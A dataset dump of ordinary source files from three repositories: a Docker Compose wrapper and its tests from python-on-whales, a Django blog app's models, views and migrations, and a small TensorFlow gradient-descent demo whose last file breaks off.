| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,875 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/compose.py | from __future__ import annotations
from typing import List
from python_on_whales.client_config import DockerCLICaller
from python_on_whales.utils import run
class ComposeCLI(DockerCLICaller):
def build(self, services: List[str] = []):
"""Build services declared in a yaml compose file.
# Arguments
services: The services to build (as strings).
If empty (default), all services are built.
"""
full_cmd = self.docker_compose_cmd + ["build"]
full_cmd += services
run(full_cmd, capture_stdout=False)
def config(self):
"""Not yet implemented"""
raise NotImplementedError
def create(self):
"""Not yet implemented"""
raise NotImplementedError
def down(self):
"""Stop and remove the containers"""
full_cmd = self.docker_compose_cmd + ["down"]
run(full_cmd)
def events(self):
"""Not yet implemented"""
raise NotImplementedError
def exec(self):
"""Not yet implemented"""
raise NotImplementedError
def images(self):
"""Not yet implemented"""
raise NotImplementedError
def kill(self):
"""Not yet implemented"""
raise NotImplementedError
def logs(self):
"""Not yet implemented"""
raise NotImplementedError
def pause(self):
"""Not yet implemented"""
raise NotImplementedError
def port(self):
"""Not yet implemented"""
raise NotImplementedError
def ps(self):
"""Not yet implemented"""
raise NotImplementedError
def pull(self):
"""Not yet implemented"""
raise NotImplementedError
def push(self):
"""Not yet implemented"""
raise NotImplementedError
def restart(self):
"""Not yet implemented"""
raise NotImplementedError
def rm(self):
"""Not yet implemented"""
raise NotImplementedError
def run(self):
"""Not yet implemented"""
raise NotImplementedError
def scale(self):
"""Not yet implemented"""
raise NotImplementedError
def start(self):
"""Not yet implemented"""
raise NotImplementedError
def stop(self):
"""Not yet implemented"""
raise NotImplementedError
def top(self):
"""Not yet implemented"""
raise NotImplementedError
def unpause(self):
"""Not yet implemented"""
raise NotImplementedError
def up(self, services: List[str] = [], detach=False):
"""Start the containers.
# Arguments
services: The services to start. If empty (default), all services are
started.
detach: If `True`, run the containers in the background. Only `True` is
supported at the moment.
"""
if not detach:
raise NotImplementedError(
"Only detaching containers is supported at the moment."
)
full_cmd = self.docker_compose_cmd + ["up"]
full_cmd.add_flag("--detach", detach)
full_cmd += services
run(full_cmd, capture_stdout=False)
def version(self):
"""Not yet implemented"""
raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,876 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_service.py | from python_on_whales.components.service import ServiceInspectResult
def test_service_inspect_result_1():
json_inspect = """
{
"ID": "m3m209zl7pxn513ufboctb3q2",
"Version": {
"Index": 102
},
"CreatedAt": "2020-11-14T15:12:39.4142383Z",
"UpdatedAt": "2020-11-14T15:12:39.4169672Z",
"Spec": {
"Name": "my_stack_influxdb",
"Labels": {
"com.docker.stack.image": "influxdb:1.7",
"com.docker.stack.namespace": "my_stack"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "influxdb:1.7@sha256:481709b32cca5001a6d03022b3a11e152fd4faa3038e5c0b92bb6de59dbbd868",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "volume",
"Source": "my_stack_influx-data",
"Target": "/var/lib/influxdb",
"VolumeOptions": {
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"DriverConfig": {
"Name": "local"
}
}
}
],
"StopGracePeriod": 10000000000,
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 600000000,
"MemoryBytes": 536870912
},
"Reservations": {
"NanoCPUs": 300000000,
"MemoryBytes": 134217728
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
},
{
"OS": "linux"
},
{
"Architecture": "arm64",
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"influxdb"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Replicated": {
"Replicas": 1
}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip"
}
},
"Endpoint": {
"Spec": {
"Mode": "vip"
},
"VirtualIPs": [
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.2/24"
}
]
}
}
"""
service_inspect_result = ServiceInspectResult.parse_raw(json_inspect)
assert service_inspect_result.ID == "m3m209zl7pxn513ufboctb3q2"
assert (
service_inspect_result.spec.labels["com.docker.stack.image"] == "influxdb:1.7"
)
def test_service_inspect_result_2():
json_inspect = """
{
"ID": "r7iyibbjflmmgsgw7wug7gamm",
"Version": {
"Index": 108
},
"CreatedAt": "2020-11-14T15:12:41.0319543Z",
"UpdatedAt": "2020-11-14T15:12:41.0357977Z",
"Spec": {
"Name": "my_stack_agent",
"Labels": {
"com.docker.stack.image": "swarmpit/agent:latest",
"com.docker.stack.namespace": "my_stack",
"swarmpit.agent": "true"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "swarmpit/agent:latest@sha256:f92ba65f7923794d43ebffc88fbd49bfe8cde8db48ca6888ece5747b9ab1375c",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Env": [
"DOCKER_API_VERSION=1.35"
],
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Target": "/var/run/docker.sock",
"ReadOnly": true
}
],
"StopGracePeriod": 10000000000,
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 100000000,
"MemoryBytes": 67108864
},
"Reservations": {
"NanoCPUs": 50000000,
"MemoryBytes": 33554432
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
},
{
"Architecture": "arm64",
"OS": "linux"
},
{
"OS": "linux"
},
{
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"agent"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Global": {}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip"
}
},
"Endpoint": {
"Spec": {
"Mode": "vip"
},
"VirtualIPs": [
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.5/24"
}
]
}
}
"""
ServiceInspectResult.parse_raw(json_inspect)
def test_service_inspect_result_3():
json_inspect = """
{
"ID": "v1z59cs9evr57w36xv3a4r4ny",
"Version": {
"Index": 115
},
"CreatedAt": "2020-11-14T15:12:42.9316045Z",
"UpdatedAt": "2020-11-14T15:12:42.9344438Z",
"Spec": {
"Name": "my_stack_app",
"Labels": {
"com.docker.stack.image": "swarmpit/swarmpit:latest",
"com.docker.stack.namespace": "my_stack"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "swarmpit/swarmpit:latest@sha256:20fddbdb7b352a5ac06f6d88bcc0ca4f67a45f1a14b18d557f01052a97a27147",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Env": [
"SWARMPIT_DB=http://db:5984",
"SWARMPIT_INFLUXDB=http://influxdb:8086"
],
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Target": "/var/run/docker.sock",
"ReadOnly": true
}
],
"StopGracePeriod": 10000000000,
"Healthcheck": {
"Test": [
"CMD",
"curl",
"-f",
"http://localhost:8080"
],
"Interval": 60000000000,
"Timeout": 10000000000,
"Retries": 3
},
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 500000000,
"MemoryBytes": 1073741824
},
"Reservations": {
"NanoCPUs": 250000000,
"MemoryBytes": 536870912
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Constraints": [
"node.role == manager"
],
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
},
{
"Architecture": "arm64",
"OS": "linux"
},
{
"OS": "linux"
},
{
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"app"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Replicated": {
"Replicas": 1
}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip",
"Ports": [
{
"Protocol": "tcp",
"TargetPort": 8080,
"PublishedPort": 888,
"PublishMode": "ingress"
}
]
}
},
"Endpoint": {
"Spec": {
"Mode": "vip",
"Ports": [
{
"Protocol": "tcp",
"TargetPort": 8080,
"PublishedPort": 888,
"PublishMode": "ingress"
}
]
},
"Ports": [
{
"Protocol": "tcp",
"TargetPort": 8080,
"PublishedPort": 888,
"PublishMode": "ingress"
}
],
"VirtualIPs": [
{
"NetworkID": "ejkqulgep23uu3a5bmgudnibe",
"Addr": "10.0.0.7/24"
},
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.7/24"
}
]
}
}
"""
ServiceInspectResult.parse_raw(json_inspect)
def test_service_inspect_result_4():
json_inspect = """
{
"ID": "ttkkm29xchs0gi83n1g0m7ov4",
"Version": {
"Index": 122
},
"CreatedAt": "2020-11-14T15:12:44.7495433Z",
"UpdatedAt": "2020-11-14T15:12:44.7547664Z",
"Spec": {
"Name": "my_stack_db",
"Labels": {
"com.docker.stack.image": "couchdb:2.3.0",
"com.docker.stack.namespace": "my_stack"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "couchdb:2.3.0@sha256:ee75c9a737e7c48af0170142689959f2d70f93700162fef40818c799dfeecb8e",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "volume",
"Source": "my_stack_db-data",
"Target": "/opt/couchdb/data",
"VolumeOptions": {
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"DriverConfig": {
"Name": "local"
}
}
}
],
"StopGracePeriod": 10000000000,
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 300000000,
"MemoryBytes": 268435456
},
"Reservations": {
"NanoCPUs": 150000000,
"MemoryBytes": 134217728
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"db"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Replicated": {
"Replicas": 1
}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip"
}
},
"Endpoint": {
"Spec": {
"Mode": "vip"
},
"VirtualIPs": [
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.9/24"
}
]
}
}
"""
ServiceInspectResult.parse_raw(json_inspect)
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,877 | arnegroskurth/python-on-whales | refs/heads/master | /docs/template/docker_objects/containers_demo.py | import sys
from python_on_whales import docker
def super_print(obj):
print(f"type = {type(obj)}, value = {obj}")
def write_code(i: int, attribute_access: str):
value = eval(attribute_access)
string = f"""In [{i}]: super_print({attribute_access})
type = {type(value)}, value = {value}
"""
sys.stdout.write(string)
container = docker.run("ubuntu", ["sleep", "infinity"], detach=True)
with container:
to_evaluate = [
"container.id",
"container.created",
"container.path",
"container.args",
"container.state.status",
"container.state.running",
"container.state.paused",
"container.state.restarting",
"container.state.oom_killed",
"container.state.dead",
"container.state.pid",
"container.state.exit_code",
"container.state.error",
"container.state.started_at",
"container.state.finished_at",
"container.state.health",
"container.image",
"container.resolv_conf_path",
]
for i, attribute_access in enumerate(to_evaluate):
write_code(i + 4, attribute_access)
print("done")
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,878 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_system.py | from python_on_whales import docker
def test_disk_free():
docker.pull("busybox")
docker.pull("busybox:1")
docker_items_summary = docker.system.disk_free()
assert docker_items_summary.images.active > 1
assert docker_items_summary.images.size > 2000
def test_info():
docker.system.info()
pass
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,880 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0004_auto_20210128_2037.py | # Generated by Django 2.2.17 on 2021-01-28 20:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0003_auto_20210128_0447'),
]
operations = [
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, null=True, upload_to='header'),
),
migrations.AlterField(
model_name='post',
name='thumbnail_image',
field=models.ImageField(blank=True, null=True, upload_to='thumbnail'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,881 | thallesdomician/blog-django | refs/heads/main | /post/models.py | from django.db import models
from django.contrib import admin
from colorfield.fields import ColorField
from django.utils.translation import ugettext_lazy as _
from django.template.defaultfilters import slugify
from tinymce.models import HTMLField
class Category(models.Model):
TEXT_COLOR = (
('w', 'white'),
('b', 'black'),
)
class Meta:
verbose_name_plural = _('Categories')
name = models.CharField(max_length=15)
color_text = models.CharField(max_length=1, choices=TEXT_COLOR, default=TEXT_COLOR[1][0])
color_background = ColorField(default='#A5F8CE')
def __str__(self):
return self.name
class CategoryAdmin(admin.ModelAdmin):
search_fields = ('name',)
fields = ('name',)
class Post(models.Model):
title = models.CharField(max_length=100, verbose_name=_('Title'))
subtitle = models.CharField(max_length=255, verbose_name=_('Subtitle'))
header_image = models.ImageField(upload_to='header/%Y/%m/', null=True, blank=True, verbose_name=_('Header Image'))
thumbnail_image = models.ImageField(upload_to='thumbnail/%Y/%m/', null=True, blank=True, verbose_name=_('Thumbnail Image'))
resume = models.TextField(blank=True, null=True, verbose_name=_('Resume'))
content = HTMLField(blank=True, null=True, verbose_name=_('Content'))
categories = models.ManyToManyField(Category, verbose_name=_('Categories'))
slug = models.SlugField(max_length=100, unique=True, default="slug", editable=False)
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created'))
updated_at = models.DateTimeField(auto_now=True, verbose_name=_('Updated'))
def __str__(self):
return self.title
def get_categories(self):
categories = self.categories.all()
return ', '.join([x.name for x in categories])
get_categories.short_description = _('Categories')
@property
def header_image_url(self):
if self.header_image and hasattr(self.header_image, 'url'):
return self.header_image.url
@property
def thumbnail_image_url(self):
if self.thumbnail_image and hasattr(self.thumbnail_image, 'url'):
return self.thumbnail_image.url
def save(self, *args, **kwargs):
self.slug = slugify(self.title)
super(Post, self).save(*args, **kwargs)
def has_thumbnail_image(self):
return True if self.thumbnail_image else False
has_thumbnail_image.boolean = True
has_thumbnail_image.short_description = _('Thumbnail')
def has_header_image(self):
return True if self.header_image else False
has_header_image.boolean = True
has_header_image.short_description = _('Image')
class PostAdmin(admin.ModelAdmin):
fieldsets = (
(_('Headers'), {
'fields': (('title', 'subtitle'),),
}),
(_('Images'), {
'fields': (('header_image', 'thumbnail_image',),)
}),
(None, {
'fields': ('resume', 'content', 'categories',)
}),
(_('Dates'), {
'fields': (('created_at', 'updated_at', ),),
'classes': ['collapse', ]
})
)
autocomplete_fields = ('categories',)
list_display = ('title', 'subtitle', 'has_header_image', 'has_thumbnail_image', 'get_categories', 'created_at')
search_fields = ('title', 'subtitle', 'resume', 'content')
list_filter = ('categories__name',)
readonly_fields = ('created_at', 'updated_at')
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,882 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0006_auto_20210128_2323.py | # Generated by Django 2.2.17 on 2021-01-28 23:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0005_auto_20210128_2039'),
]
operations = [
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, null=True, upload_to='header/%Y/%m/'),
),
migrations.AlterField(
model_name='post',
name='thumbnail_image',
field=models.ImageField(blank=True, null=True, upload_to='thumbnail/%Y/%m/'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,883 | thallesdomician/blog-django | refs/heads/main | /post/urls.py | from django.urls import path
from .views import PostList, PostView, PostUpdate, PostDelete, PostCreate
from django.contrib.auth.decorators import login_required
urlpatterns = [
path('', PostList.as_view(), name='post_list'),
path('new/', login_required(PostCreate.as_view()), name='post_create'),
path('<slug:slug>/', PostView.as_view(), name='post_detail'),
path('<slug:slug>/update/', login_required(PostUpdate.as_view()), name='post_update'),
path('<slug:slug>/delete/', login_required(PostDelete.as_view()), name='post_delete'),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,884 | thallesdomician/blog-django | refs/heads/main | /post/forms.py | from django import forms
from .models import Post
from tinymce.widgets import TinyMCE
from tinymce import models as tinymce_models
class PostForm(forms.ModelForm):
resume = forms.CharField(widget=TinyMCE(attrs={'cols': 80, 'rows': 10}))
content = forms.CharField(widget=TinyMCE(attrs={'cols': 80, 'rows': 30}))
class Meta:
model = Post
fields = [
'title',
'subtitle',
'header_image',
'thumbnail_image',
'resume',
'content',
'categories'
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,885 | thallesdomician/blog-django | refs/heads/main | /post/views.py | from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.urls import reverse_lazy
from django.views import View
from django.views.generic import ListView
from django.views.generic.detail import DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from .models import Post, Category
from .forms import PostForm
from django.shortcuts import render
from django.utils.translation import gettext as _
class HomeView(View):
def get(self, request):
return render(request=request, template_name='base.html')
class PostList(ListView):
model = Post
paginate_by = 2
ordering = ['-created_at']
def get_context_data(self, *, object_list=None, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Blog')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
class PostCreate(CreateView):
model = Post
fields = ['title', 'subtitle', 'header_image', 'thumbnail_image', 'resume', 'content', 'categories']
template_name_suffix = '_create_form'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Create Post')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
def get_success_url(self, **kwargs):
return reverse_lazy("post_detail", args=(self.object.slug,))
class PostUpdate(UpdateView):
model = Post
form_class = PostForm
template_name_suffix = '_update_form'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Update Post')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
def get_success_url(self, **kwargs):
return reverse_lazy("post_detail", args=(self.object.slug,))
class PostView(DetailView):
model = Post
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Update Post')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
class PostDelete(DeleteView):
model = Post
success_url = reverse_lazy('post_list')
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,886 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0013_auto_20210208_2108.py | # Generated by Django 2.2.17 on 2021-02-08 21:08
from django.db import migrations, models
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('post', '0012_auto_20210208_2036'),
]
operations = [
migrations.AlterField(
model_name='post',
name='categories',
field=models.ManyToManyField(to='post.Category', verbose_name='Categories'),
),
migrations.AlterField(
model_name='post',
name='content',
field=tinymce.models.HTMLField(blank=True, null=True, verbose_name='Content'),
),
migrations.AlterField(
model_name='post',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='Created at'),
),
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, null=True, upload_to='header/%Y/%m/', verbose_name='Header Image'),
),
migrations.AlterField(
model_name='post',
name='resume',
field=models.TextField(blank=True, null=True, verbose_name='Resume'),
),
migrations.AlterField(
model_name='post',
name='subtitle',
field=models.CharField(max_length=255, verbose_name='Subtitle'),
),
migrations.AlterField(
model_name='post',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='Updated at'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,887 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0001_initial.py | # Generated by Django 2.2.17 on 2021-01-28 04:35
import colorfield.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=15)),
('color_text', models.CharField(choices=[('w', 'white'), ('b', 'black')], default='b', max_length=1)),
('color_background', colorfield.fields.ColorField(default='#A5F8CE', max_length=18)),
],
options={
'verbose_name_plural': 'Categories',
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('subtitle', models.CharField(max_length=255)),
('header_image', models.ImageField(blank=True, null=True, upload_to='block-image/header')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='block-image/thumbnail')),
('resume', models.TextField(blank=True, null=True)),
('content', models.TextField(blank=True, null=True)),
('slug', models.SlugField(max_length=100, unique=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField(auto_now=True)),
('categories', models.ManyToManyField(to='post.Category')),
],
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,888 | thallesdomician/blog-django | refs/heads/main | /post/admin.py | from django.contrib import admin
# Register your models here.
from django.utils.translation import ugettext_lazy as _
from .models import Post, PostAdmin, Category, CategoryAdmin
admin.site.register(Post, PostAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.site_header = _('Marcos\' Blog')
admin.site.index_title = _('Administration')
admin.site.site_title = _('Marcos\' Blog')
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,889 | thallesdomician/blog-django | refs/heads/main | /user/urls.py | from django.urls import path
from .views import detail
urlpatterns = [
path('', detail, name='detail'),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,890 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0007_auto_20210129_0020.py | # Generated by Django 2.2.17 on 2021-01-29 00:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0006_auto_20210128_2323'),
]
operations = [
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, default='default_thumbnail.jpg', null=True, upload_to='header/%Y/%m/'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,924 | i0Ek3/biatch | refs/heads/master | /train.py | #!/usr/bin/env python
# coding=utf-8
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
def train(a):
    """TF1-style demo: build a graph minimising cost = (w - 5)^2 with
    gradient descent at learning rate *a*, then print w's current value.

    NOTE(review): the optimiser op `train` is built but never run inside the
    session, so the printed value is always the initial 0.0; the placeholder
    `x` is also never fed or used — confirm whether the training loop was
    left out intentionally.
    """
    # Scalar parameter to optimise, initialised to 0.
    w = tf.Variable(0, dtype=tf.float32)
    # Unused placeholder (see NOTE above).
    x = tf.placeholder(tf.float32, [3,1])
    # cost = w^2 - 10w + 25 = (w - 5)^2, minimised at w = 5.
    cost = w ** 2 - 10 * w + 25
    # Gradient-descent step op; shadows the module-level function name.
    train = tf.train.GradientDescentOptimizer(a).minimize(cost)
    init = tf.global_variables_initializer()
    with tf.Session() as session:
        session.run(init)
        print(session.run(w))
| {"/main.py": ["/train.py"]} |
49,925 | i0Ek3/biatch | refs/heads/master | /main.py | #!/usr/bin/env python
# coding=utf-8
import train as t
def main():
    """Prompt the user; any non-empty reply triggers the training demo."""
